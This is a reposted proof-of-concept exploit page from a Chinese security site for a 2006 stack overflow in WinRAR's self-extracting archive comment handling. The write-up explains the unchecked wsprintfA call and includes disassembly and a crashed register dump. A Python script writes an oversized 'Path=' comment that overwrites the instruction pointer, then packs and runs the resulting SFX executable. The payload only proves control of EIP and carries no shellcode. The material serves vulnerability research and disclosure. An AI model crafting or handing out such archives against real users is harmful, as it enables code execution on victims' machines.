首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WinRAR <= 3.60 beta 6 (SFX Path) Stack Overflow Exploit PoC
来源:vfocus.net 作者:posidron 发布时间:2006-07-06  

"""
WinRAR - Stack Overflows in SelF - eXtracting Archives
======================================================

Tested Version(s)..: WinRAR 3.60 beta 4
Author.............: posidron

An SFX (SelF-eXtracting) archive is an archive, merged with an executable
module, which is used to extract files from the archive when executed. Thus no
external program is necessary to extract the contents of an SFX archive, it is
enough to execute it. Nevertheless WinRAR can work with SFX archives as with
any other archives, so if you do not want to run a received SFX archive (for
example, because of possible viruses), you may use WinRAR to view or extract
its contents. SFX archives usually have .exe extension as any other executable
file. (Quote: WinRAR Help)

WinRAR distributive includes several SFX modules. All SFX modules have .sfx
extension and must be in the same folder as WinRAR. By default WinRAR always
uses Default.sfx module.

Following commands are supported SFX commands by WinRAR, to configure the
executable module and to provide additional informations. These commands
will be placed in the "Comments" section within the produced package.

License=<title of the license dialog>{license text}
Delete=<filename>
Overwrite=[n]
Path=<path>
Presetup=<program /arguments>
Savepath
Setup=<program>
Shortcut=<DestType>,<SrcName>,<DestFolder>, <Description>,<ShortcutName>
Silent=[Param]
TempMode=[question,title]
Text={string}
Title=<title>

A detailed explanation of each command can be obtained in the "WinRAR Help",
in chapter SFX.

Each command above, which take string sequences as arguments is vulnerable
to a plain stack overflow while passing the user controled buffer through a
wsprintfA() without bounds checking.

This command allows to add a comment to an archive. The maximum comment
length is 62000 bytes for RAR archives and 32768 bytes for ZIP archives.
(Quote: WinRAR Help)

I selected the "Path" command to do a proof of concept of this vulnerability.
(2039 fill bytes + 4 bytes to overwrite the instruction pointer)

Example:

004039B6 push 0 ; /lParam = NULL
=> 004039B8 push sample.00401183 ; |DlgProc = sample.00401183
004039BD lea edx, dword ptr ss:[ebp-24] ; |
004039C0 push 0 ; |hOwner = NULL
004039C2 mov dword ptr ds:[415D78], edx ; |
004039C8 lea ecx, dword ptr ss:[ebp-3C] ; |
004039CB push sample.00414113 ; |pTemplate = "STARTDLG"
004039D0 push ebx ; |hInst
004039D1 mov dword ptr ds:[415D7C], ecx ; |
004039D7 call <jmp.&USER32.DialogBoxParamA> ; \DialogBoxParamA
........
=> 00401183 push ebp
00401184 mov ebp, esp
<snip>
004015D0 push eax ; /Path
004015D1 call <jmp.&KERNEL32.SetCurrentDirecto>; \SetCurrentDirectoryA
004015D6 test eax, eax
004015D8 jnz short sample.00401641
004015DA mov eax, 82
004015DF call sample.004029B4
004015E4 push eax ; /<%s>
004015E5 lea edx, dword ptr ss:[ebp-2C14] ; |
004015EB push edx ; |<%s>
004015EC push sample.00414132 ; |Format = "\"%s\"\n%s"
004015F1 lea ecx, dword ptr ss:[ebp-2E14] ; |
004015F7 push ecx ; |s
:) 004015F8 call <jmp.&USER32.wsprintfA> ; \wsprintfA
<snip>

After overflowing the "path" command:

EAX 00000000
ECX 766EF7A0
EDX 3F55EB94 ntdll.KiFastSystemCallRet
EBX 41414141
ESP 766EFFDC ASCII "BBBBBBBBBBBB"
EBP 00000003
ESI 7673DB1E ASCII "SavePath\r\n"
EDI 00414064 sample.00414064
EIP DEADBEEF

The user has to open the SFX archive directly, so that nomally the GUI installer
would popup, to trigger the vulnerability. Not by choosing the "Extract to.."
option of WinRAR in the "right click" context menu.
"""

import os, sys

winrar__ = 'C:\Programme\WinRAR\WinRAR.exe'
sfxnfo__ = "comment.txt"
result__ = "sample.exe"


buf = "Path=" + "A" * 2039 + "\xef\xbe\xad\xde" + "B" * 12 + "\r\nSavePath\r\n"

try:
info = open(sfxnfo__, "w+b")
info.write(buf)
info.close()
except IOError:
sys.exit("Error: unable to create: " + sfxnfo__)

try:
print "Creating archive:",
os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
print "done."
print "Executing:",
# debug only!
os.spawnv(os.P_WAIT, result__, [result__, ""])
print "done."
print "Cleaning up:",
os.remove(sfxnfo__)
print "done."
except OSError:
print "failed!"
sys.exit("Error: application execution failed!")



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ImgSvr <= 0.6.5 (long http
·WinRAR <= 3.60 beta 6 (SFX
·Microsoft Excel Universal Hlin
·Microsoft Excel 2000/2003 Hlin
·Quake 3 Engine Client CS_ITEMS
·Microsoft Excel 2003 Hlink Loc
·Quake 3 Engine Client CG_Serve
·MS Internet Explorer 6 (Intern
·BXCP <= 0.3.0.4 (where) Re
·Pivot <= 1.30 RC2 Privilege
·Mac OS X <= 10.4.6 (launchd
·WinRAR <= 3.60 beta 6 (SFX
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved